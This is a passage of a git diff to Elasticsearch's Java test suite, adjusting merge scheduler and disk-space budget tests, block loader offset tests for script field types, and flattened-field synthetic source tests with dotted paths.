+99,14 @@ public static void installMockUsableSpaceFS() throws Exception { nodeEnvironment = new NodeEnvironment(settings, TestEnvironment.newEnvironment(settings)); } - @AfterClass - public static void removeMockUsableSpaceFS() { + @After + public void removeMockUsableSpaceFS() { + if (setThreadPoolMergeSchedulerSetting) { + assertWarnings( + "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " + + "and will be removed in a future release. See the breaking changes documentation for the next major version." + ); + } PathUtilsForTesting.teardown(); aFileStore = null; bFileStore = null; @@ -105,11 +114,6 @@ public static void removeMockUsableSpaceFS() { nodeEnvironment.close(); } - @After - public void cleanupThreadPool() { - testThreadPool.scheduledTasks.clear(); - } - static class TestCapturingThreadPool extends TestThreadPool { final List> scheduledTasks = new ArrayList<>(); @@ -319,8 +323,6 @@ public void testDiskSpaceMonitorStartsAsDisabled() throws Exception { ) ); } - aFileStore.throwIoException = false; - bFileStore.throwIoException = false; } public void testAvailableDiskSpaceMonitorWhenFileSystemStatErrors() throws Exception { @@ -406,8 +408,6 @@ public void testAvailableDiskSpaceMonitorWhenFileSystemStatErrors() throws Excep } }); } - aFileStore.throwIoException = false; - bFileStore.throwIoException = false; } public void testAvailableDiskSpaceMonitorSettingsUpdate() throws Exception { @@ -516,12 +516,6 @@ public void testAvailableDiskSpaceMonitorSettingsUpdate() throws Exception { } }, 5, TimeUnit.SECONDS); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { @@ -564,7 +558,7 @@ public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { testDoneLatch.await(); return null; }).when(stallingMergeTask).abort(); - threadPoolMergeExecutorService.submitMergeTask(stallingMergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(stallingMergeTask)); // assert the merge task is holding up disk space budget expectedAvailableBudget.set(expectedAvailableBudget.get() - taskBudget); assertBusy( @@ -574,7 +568,7 @@ public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { ThreadPoolMergeScheduler.MergeTask mergeTask = mock(ThreadPoolMergeScheduler.MergeTask.class); when(mergeTask.estimatedRemainingMergeSize()).thenReturn(randomLongBetween(0L, expectedAvailableBudget.get())); when(mergeTask.schedule()).thenReturn(RUN); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); assertBusy(() -> { verify(mergeTask).schedule(); verify(mergeTask).run(); @@ -595,12 +589,6 @@ public void testAbortingOrRunningMergeTaskHoldsUpBudget() throws Exception { assertThat(threadPoolMergeExecutorService.allDone(), is(true)); }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." 
- ); - } } public void testBackloggedMergeTasksDoNotHoldUpBudget() throws Exception { @@ -654,7 +642,7 @@ && randomBoolean()) { testDoneLatch.await(); return null; }).when(mergeTask).abort(); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); if (mergeTask.schedule() == RUN) { runningMergeTasks.add(mergeTask); } else { @@ -679,7 +667,7 @@ && randomBoolean()) { return RUN; } }).when(mergeTask).schedule(); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); backloggingMergeTasksScheduleCountMap.put(mergeTask, 1); } int checkRounds = randomIntBetween(1, 10); @@ -712,7 +700,7 @@ && randomBoolean()) { long taskBudget = randomLongBetween(1L, backloggedMergeTaskDiskSpaceBudget); when(mergeTask.estimatedRemainingMergeSize()).thenReturn(taskBudget); when(mergeTask.schedule()).thenReturn(RUN); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); assertBusy(() -> { verify(mergeTask).schedule(); verify(mergeTask).run(); @@ -739,12 +727,6 @@ && randomBoolean()) { assertThat(threadPoolMergeExecutorService.allDone(), is(true)); }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() throws Exception { @@ -789,16 +771,8 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro while (submittedMergesCount > 0 && expectedAvailableBudget.get() > 0L) { ThreadPoolMergeScheduler.MergeTask mergeTask = mock(ThreadPoolMergeScheduler.MergeTask.class); when(mergeTask.supportsIOThrottling()).thenReturn(randomBoolean()); - doAnswer(mock -> { - Schedule schedule = randomFrom(Schedule.values()); - if (schedule == BACKLOG) { - testThreadPool.executor(ThreadPool.Names.GENERIC).execute(() -> { - // re-enqueue backlogged merge task - threadPoolMergeExecutorService.reEnqueueBackloggedMergeTask(mergeTask); - }); - } - return schedule; - }).when(mergeTask).schedule(); + // avoid backlogging and re-enqueueing merge tasks in this test because it makes the queue's available budget unsteady + when(mergeTask.schedule()).thenReturn(randomFrom(RUN, ABORT)); // let some task complete, which will NOT hold up any budget if (randomBoolean()) { // this task will NOT hold up any budget because it runs quickly (it is not blocked) @@ -823,7 +797,7 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro runningOrAbortingMergeTasksList.add(mergeTask); latchesBlockingMergeTasksList.add(blockMergeTaskLatch); } - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); } // currently running (or aborting) merge tasks have consumed some of the available budget while (runningOrAbortingMergeTasksList.isEmpty() == false) { @@ -855,8 +829,8 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro // merge task 2 can run because it is under budget when(mergeTask2.estimatedRemainingMergeSize()).thenReturn(underBudget); } - threadPoolMergeExecutorService.submitMergeTask(mergeTask1); - threadPoolMergeExecutorService.submitMergeTask(mergeTask2); +
assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask1)); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask2)); assertBusy(() -> { if (task1Runs) { verify(mergeTask1).schedule(); @@ -890,12 +864,6 @@ public void testUnavailableBudgetBlocksNewMergeTasksFromStartingExecution() thro bFileStore.usableSpace = Long.MAX_VALUE; assertBusy(() -> assertThat(threadPoolMergeExecutorService.allDone(), is(true))); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testEnqueuedMergeTasksAreUnblockedWhenEstimatedMergeSizeChanges() throws Exception { @@ -924,8 +892,8 @@ public void testEnqueuedMergeTasksAreUnblockedWhenEstimatedMergeSizeChanges() th assertBusy( () -> assertThat(threadPoolMergeExecutorService.getDiskSpaceAvailableForNewMergeTasks(), is(expectedAvailableBudget.get())) ); - List<ThreadPoolMergeScheduler.MergeTask> tasksRunList = new ArrayList<>(); - List<ThreadPoolMergeScheduler.MergeTask> tasksAbortList = new ArrayList<>(); + Set<ThreadPoolMergeScheduler.MergeTask> tasksRunList = ConcurrentCollections.newConcurrentSet(); + Set<ThreadPoolMergeScheduler.MergeTask> tasksAbortList = ConcurrentCollections.newConcurrentSet(); int submittedMergesCount = randomIntBetween(1, 5); long[] mergeSizeEstimates = new long[submittedMergesCount]; for (int i = 0; i < submittedMergesCount; i++) { @@ -990,12 +958,6 @@ public void testEnqueuedMergeTasksAreUnblockedWhenEstimatedMergeSizeChanges() th } }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version." - ); - } } public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws Exception { @@ -1058,7 +1020,7 @@ public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws testDoneLatch.await(); return null; }).when(mergeTask).abort(); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); if (mergeTask.schedule() == RUN) { runningMergeTasks.add(mergeTask); } else { @@ -1083,7 +1045,7 @@ public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws when(mergeTask.estimatedRemainingMergeSize()).thenReturn(taskBudget); Schedule schedule = randomFrom(RUN, ABORT); when(mergeTask.schedule()).thenReturn(schedule); - threadPoolMergeExecutorService.submitMergeTask(mergeTask); + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); if (schedule == RUN) { overBudgetTasksToRunList.add(mergeTask); } else { @@ -1150,11 +1112,5 @@ public void testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable() throws ); }); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " - + "and will be removed in a future release. See the breaking changes documentation for the next major version."
- ); - } } } diff --git a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java index cec52af12cade..2417ee3abf8d2 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceTests.java @@ -51,7 +51,6 @@ import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.greaterThanOrEqualTo; -import static org.hamcrest.Matchers.hasItem; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.lessThan; import static org.hamcrest.Matchers.lessThanOrEqualTo; @@ -329,7 +328,7 @@ public void testIORateIsAdjustedForAllRunningMergeTasks() throws Exception { ThreadPoolExecutor threadPoolExecutor = (ThreadPoolExecutor) testThreadPool.executor(ThreadPool.Names.MERGE); Semaphore runMergeSemaphore = new Semaphore(0); Set<MergeTask> currentlyRunningMergeTasksSet = ConcurrentCollections.newConcurrentSet(); - Set<MergeTask> currentlyRunningOrAbortingMergeTasksSet = ConcurrentCollections.newConcurrentSet(); + while (mergesStillToComplete > 0) { if (mergesStillToSubmit > 0 && (currentlyRunningMergeTasksSet.isEmpty() || randomBoolean())) { MergeTask mergeTask = mock(MergeTask.class); @@ -347,27 +346,17 @@ public void testIORateIsAdjustedForAllRunningMergeTasks() throws Exception { }).when(mergeTask).schedule(); doAnswer(mock -> { currentlyRunningMergeTasksSet.add(mergeTask); - currentlyRunningOrAbortingMergeTasksSet.add(mergeTask); // wait to be signalled before completing runMergeSemaphore.acquire(); - currentlyRunningOrAbortingMergeTasksSet.remove(mergeTask); currentlyRunningMergeTasksSet.remove(mergeTask); return null; }).when(mergeTask).run(); doAnswer(mock -> { - currentlyRunningOrAbortingMergeTasksSet.add(mergeTask); // wait to be signalled before completing runMergeSemaphore.acquire(); - currentlyRunningOrAbortingMergeTasksSet.remove(mergeTask); return null; }).when(mergeTask).abort(); - assertThat(runMergeSemaphore.availablePermits(), is(0)); - boolean isAnyExecutorAvailable = currentlyRunningOrAbortingMergeTasksSet.size() < mergeExecutorThreadCount; - boolean mergeTaskSubmitted = threadPoolMergeExecutorService.submitMergeTask(mergeTask); - assertTrue(mergeTaskSubmitted); - if (isAnyExecutorAvailable) { - assertBusy(() -> assertThat(currentlyRunningOrAbortingMergeTasksSet, hasItem(mergeTask))); - } + assertTrue(threadPoolMergeExecutorService.submitMergeTask(mergeTask)); long latestIORate = threadPoolMergeExecutorService.getTargetIORateBytesPerSec(); // all currently running merge tasks must be IO throttled to the latest IO Rate assertBusy(() -> { diff --git a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java index d88f7c67b0bbd..bea7697fd51c6 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeSchedulerTests.java @@ -612,11 +612,12 @@ public void testSchedulerCloseWaitsForRunningMerge() throws Exception { fail(e); } }); + // test expects that there definitely is a running merge before closing the merge scheduler + mergeRunningLatch.await(); + // closes the merge scheduler t.start(); try { assertTrue(t.isAlive()); - // wait for the
merge to actually run - mergeRunningLatch.await(); // ensure the merge scheduler is effectively "closed" assertBusy(() -> { MergeSource mergeSource2 = mock(MergeSource.class); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java index 73d76ad48c955..6a81a93923abc 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/AbstractShapeGeometryFieldMapperTests.java @@ -125,7 +125,7 @@ private static void testBoundsBlockLoaderAux( for (int j : array) { expected.add(visitor.apply(geometries.get(j + currentIndex)).get()); } - try (var block = (TestBlock) loader.reader(leaf).read(TestBlock.factory(leafReader.numDocs()), TestBlock.docs(array))) { + try (var block = (TestBlock) loader.reader(leaf).read(TestBlock.factory(), TestBlock.docs(array), 0)) { for (int i = 0; i < block.size(); i++) { intArrayResults.add(block.get(i)); } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java b/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java index 357ada3ad656d..1fa9c85a5c738 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/BlockSourceReaderTests.java @@ -59,7 +59,7 @@ private void loadBlock(LeafReaderContext ctx, Consumer test) throws I StoredFieldLoader.fromSpec(loader.rowStrideStoredFieldSpec()).getLoader(ctx, null), loader.rowStrideStoredFieldSpec().requiresSource() ? SourceLoader.FROM_STORED_SOURCE.leaf(ctx.reader(), null) : null ); - BlockLoader.Builder builder = loader.builder(TestBlock.factory(ctx.reader().numDocs()), 1); + BlockLoader.Builder builder = loader.builder(TestBlock.factory(), 1); storedFields.advanceTo(0); reader.read(0, storedFields, builder); TestBlock block = (TestBlock) builder.build(); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java index ce9a9bc0688f3..54656ab1af3ee 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/BooleanScriptFieldTypeTests.java @@ -446,7 +446,8 @@ public void testBlockLoader() throws IOException { try (DirectoryReader reader = iw.getReader()) { BooleanScriptFieldType fieldType = build("xor_param", Map.of("param", false), OnScriptError.FAIL); List expected = List.of(false, true); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(expected.subList(1, 2))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(expected)); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java index 3d8ed5ea60262..1eb0ba07d58e2 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/DateScriptFieldTypeTests.java @@ -493,9 +493,10 @@ public 
void testBlockLoader() throws IOException { try (DirectoryReader reader = iw.getReader()) { DateScriptFieldType fieldType = build("add_days", Map.of("days", 1), OnScriptError.FAIL); assertThat( - blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), + blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(1595518581354L, 1595518581355L)) ); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(1595518581355L))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(1595518581354L, 1595518581355L))); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java index 140137015d98a..b1cda53876993 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/DoubleScriptFieldTypeTests.java @@ -262,7 +262,8 @@ public void testBlockLoader() throws IOException { ); try (DirectoryReader reader = iw.getReader()) { DoubleScriptFieldType fieldType = build("add_param", Map.of("param", 1), OnScriptError.FAIL); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(List.of(2d, 3d))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(2d, 3d))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(3d))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(2d, 3d))); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java index 11e2305838705..423811c9e22a2 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapperTests.java @@ -10,12 +10,14 @@ package org.elasticsearch.index.mapper; import org.apache.lucene.index.DirectoryReader; +import org.elasticsearch.common.Strings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.CheckedConsumer; import org.elasticsearch.core.Nullable; import org.elasticsearch.search.lookup.SourceFilter; import org.elasticsearch.test.FieldMaskingReader; import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.json.JsonXContent; import org.hamcrest.Matchers; import org.junit.Before; @@ -123,6 +125,15 @@ public void testIgnoredString() throws IOException { ); } + public void testIgnoredStringFullUnicode() throws IOException { + String value = randomUnicodeOfCodepointLengthBetween(5, 20); + String fieldName = randomUnicodeOfCodepointLength(5); + + String expected = Strings.toString(JsonXContent.contentBuilder().startObject().field(fieldName, value).endObject()); + + assertEquals(expected, getSyntheticSourceWithFieldLimit(b -> b.field(fieldName, value))); + } + public void testIgnoredInt() throws IOException { int value = randomInt(); assertEquals("{\"my_value\":" + value + "}", getSyntheticSourceWithFieldLimit(b -> b.field("my_value", value))); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java index 281d2993fa29c..7e9a236f6cc74 100644 --- 
a/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/IpScriptFieldTypeTests.java @@ -273,7 +273,8 @@ public void testBlockLoader() throws IOException { new BytesRef(InetAddressPoint.encode(InetAddresses.forString("192.168.0.1"))), new BytesRef(InetAddressPoint.encode(InetAddresses.forString("192.168.1.1"))) ); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(expected)); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(expected.subList(1, 2))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(expected)); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java b/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java index 57d52991a6442..ccc8ccac4deb4 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/KeywordScriptFieldTypeTests.java @@ -409,9 +409,10 @@ public void testBlockLoader() throws IOException { try (DirectoryReader reader = iw.getReader()) { KeywordScriptFieldType fieldType = build("append_param", Map.of("param", "-Suffix"), OnScriptError.FAIL); assertThat( - blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), + blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(new BytesRef("1-Suffix"), new BytesRef("2-Suffix"))) ); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(new BytesRef("2-Suffix")))); assertThat( blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(new BytesRef("1-Suffix"), new BytesRef("2-Suffix"))) diff --git a/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java index 9a0f4baa8f21a..b68838ba71eb2 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/LongFieldMapperTests.java @@ -103,6 +103,9 @@ public void testLongIndexingCoercesIntoRange() throws Exception { assertThat(doc.rootDoc().getFields("field"), hasSize(1)); } + // The largest long (2^53) for which all longs up to it are exactly representable as doubles + public static final long MAX_SAFE_LONG_FOR_DOUBLE = 1L << 53; + @Override protected Number randomNumber() { if (randomBoolean()) { @@ -111,13 +114,8 @@ protected Number randomNumber() { if (randomBoolean()) { return randomDouble(); } - assumeFalse("https://github.com/elastic/elasticsearch/issues/70585", true); - return randomDoubleBetween(Long.MIN_VALUE, Long.MAX_VALUE, true); - } - - @AwaitsFix(bugUrl = "https://github.com/elastic/elasticsearch/issues/70585") - public void testFetchCoerced() throws IOException { - assertFetch(randomFetchTestMapper(), "field", 3.783147882954537E18, randomFetchTestFormat()); + // TODO: increase the range back to the full long range once https://github.com/elastic/elasticsearch/issues/132893 is fixed + return randomDoubleBetween(-MAX_SAFE_LONG_FOR_DOUBLE, MAX_SAFE_LONG_FOR_DOUBLE, true); } protected IngestScriptSupport ingestScriptSupport() { diff --git a/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java
b/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java index a8cb4d51c5efa..01f96a1a4b1be 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/LongScriptFieldTypeTests.java @@ -295,7 +295,8 @@ public void testBlockLoader() throws IOException { ); try (DirectoryReader reader = iw.getReader()) { LongScriptFieldType fieldType = build("add_param", Map.of("param", 1), OnScriptError.FAIL); - assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType), equalTo(List.of(2L, 3L))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 0), equalTo(List.of(2L, 3L))); + assertThat(blockLoaderReadValuesFromColumnAtATimeReader(reader, fieldType, 1), equalTo(List.of(3L))); assertThat(blockLoaderReadValuesFromRowStrideReader(reader, fieldType), equalTo(List.of(2L, 3L))); } } diff --git a/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java b/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java index 77c42740451ee..ce5482b15b0ee 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/blockloader/TextFieldBlockLoaderTests.java @@ -27,6 +27,9 @@ public TextFieldBlockLoaderTests(Params params) { @Override protected Object expected(Map fieldMapping, Object value, TestContext testContext) { + logger.info("field mapping={}", fieldMapping); + logger.info("value={}", value); + logger.info("params={}", params.toString()); return expectedValue(fieldMapping, value, params, testContext); } @@ -82,7 +85,8 @@ public static Object expectedValue(Map fieldMapping, Object valu .map(BytesRef::new) .collect(Collectors.toList()); - if (store == false) { + String ssk = (String) keywordMultiFieldMapping.get("synthetic_source_keep"); + if (store == false && "arrays".equals(ssk) == false) { // using doc_values for synthetic source indexed = new ArrayList<>(new HashSet<>(indexed)); indexed.sort(BytesRef::compareTo); diff --git a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java index c6062efc744d9..0628ca47308ea 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldMapperTests.java @@ -931,6 +931,56 @@ public void testSyntheticSourceWithEmptyObject() throws IOException { {"field":{"key1":"foo"}}""")); } + public void testSyntheticSourceWithMatchesInNestedPath() throws IOException { + DocumentMapper mapper = createSytheticSourceMapperService( + mapping(b -> { b.startObject("field").field("type", "flattened").endObject(); }) + ).documentMapper(); + + // This test covers a scenario that previously had a bug. + // Since a.b.c and b.b.d have a matching middle key `b`, and b.b.d starts with a `b`, + // startObject was not called for the first `b` in b.b.d. 
+ // For a full explanation see this comment: https://github.com/elastic/elasticsearch/pull/129600#issuecomment-3024476134 + var syntheticSource = syntheticSource(mapper, b -> { + b.startObject("field"); + { + b.startObject("a"); + { + b.startObject("b").field("c", "1").endObject(); + } + b.endObject(); + b.startObject("b"); + { + b.startObject("b").field("d", "2").endObject(); + } + b.endObject(); + } + b.endObject(); + }); + assertThat(syntheticSource, equalTo(""" + {"field":{"a":{"b":{"c":"1"}},"b":{"b":{"d":"2"}}}}""")); + } + + public void testMultipleDotsInPath() throws IOException { + DocumentMapper mapper = createSytheticSourceMapperService( + mapping(b -> { b.startObject("field").field("type", "flattened").endObject(); }) + ).documentMapper(); + + var syntheticSource = syntheticSource(mapper, b -> { + b.startObject("field"); + { + b.startObject("."); + { + b.field(".", "bar"); + } + b.endObject(); + } + b.endObject(); + }); + // This behavior is weird to say the least. But this is the only reasonable way to interpret the meaning of the path `...` + assertThat(syntheticSource, equalTo(""" + {"field":{"":{"":{"":{"":"bar"}}}}}""")); + } + @Override protected boolean supportsCopyTo() { return false; diff --git a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java index 4ca5da1c42d40..f59640194f8cd 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelperTests.java @@ -21,6 +21,7 @@ import java.nio.charset.StandardCharsets; import java.util.List; import java.util.stream.Collectors; +import java.util.stream.Stream; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; @@ -246,6 +247,54 @@ public void testScalarObjectMismatchInNestedObject() throws IOException { assertEquals("{\"a\":{\"b\":{\"c\":\"10\",\"c.d\":\"20\"}}}", baos.toString(StandardCharsets.UTF_8)); } + public void testSingleDotPath() throws IOException { + // GIVEN + final SortedSetDocValues dv = mock(SortedSetDocValues.class); + final FlattenedFieldSyntheticWriterHelper writer = new FlattenedFieldSyntheticWriterHelper(new SortedSetSortedKeyedValues(dv)); + final ByteArrayOutputStream baos = new ByteArrayOutputStream(); + final XContentBuilder builder = new XContentBuilder(XContentType.JSON.xContent(), baos); + final List bytes = Stream.of("." 
+ '\0' + "10").map(x -> x.getBytes(StandardCharsets.UTF_8)).toList(); + when(dv.getValueCount()).thenReturn(Long.valueOf(bytes.size())); + when(dv.docValueCount()).thenReturn(bytes.size()); + for (int i = 0; i < bytes.size(); i++) { + when(dv.nextOrd()).thenReturn((long) i); + when(dv.lookupOrd(ArgumentMatchers.eq((long) i))).thenReturn(new BytesRef(bytes.get(i), 0, bytes.get(i).length)); + } + + // WHEN + builder.startObject(); + writer.write(builder); + builder.endObject(); + builder.flush(); + + // THEN + assertEquals("{\"\":{\"\":\"10\"}}", baos.toString(StandardCharsets.UTF_8)); + } + + public void testTrailingDotsPath() throws IOException { + // GIVEN + final SortedSetDocValues dv = mock(SortedSetDocValues.class); + final FlattenedFieldSyntheticWriterHelper writer = new FlattenedFieldSyntheticWriterHelper(new SortedSetSortedKeyedValues(dv)); + final ByteArrayOutputStream baos = new ByteArrayOutputStream(); + final XContentBuilder builder = new XContentBuilder(XContentType.JSON.xContent(), baos); + final List bytes = Stream.of("cat.." + '\0' + "10").map(x -> x.getBytes(StandardCharsets.UTF_8)).toList(); + when(dv.getValueCount()).thenReturn(Long.valueOf(bytes.size())); + when(dv.docValueCount()).thenReturn(bytes.size()); + for (int i = 0; i < bytes.size(); i++) { + when(dv.nextOrd()).thenReturn((long) i); + when(dv.lookupOrd(ArgumentMatchers.eq((long) i))).thenReturn(new BytesRef(bytes.get(i), 0, bytes.get(i).length)); + } + + // WHEN + builder.startObject(); + writer.write(builder); + builder.endObject(); + builder.flush(); + + // THEN + assertEquals("{\"cat\":{\"\":{\"\":\"10\"}}}", baos.toString(StandardCharsets.UTF_8)); + } + private class SortedSetSortedKeyedValues implements FlattenedFieldSyntheticWriterHelper.SortedKeyedValues { private final 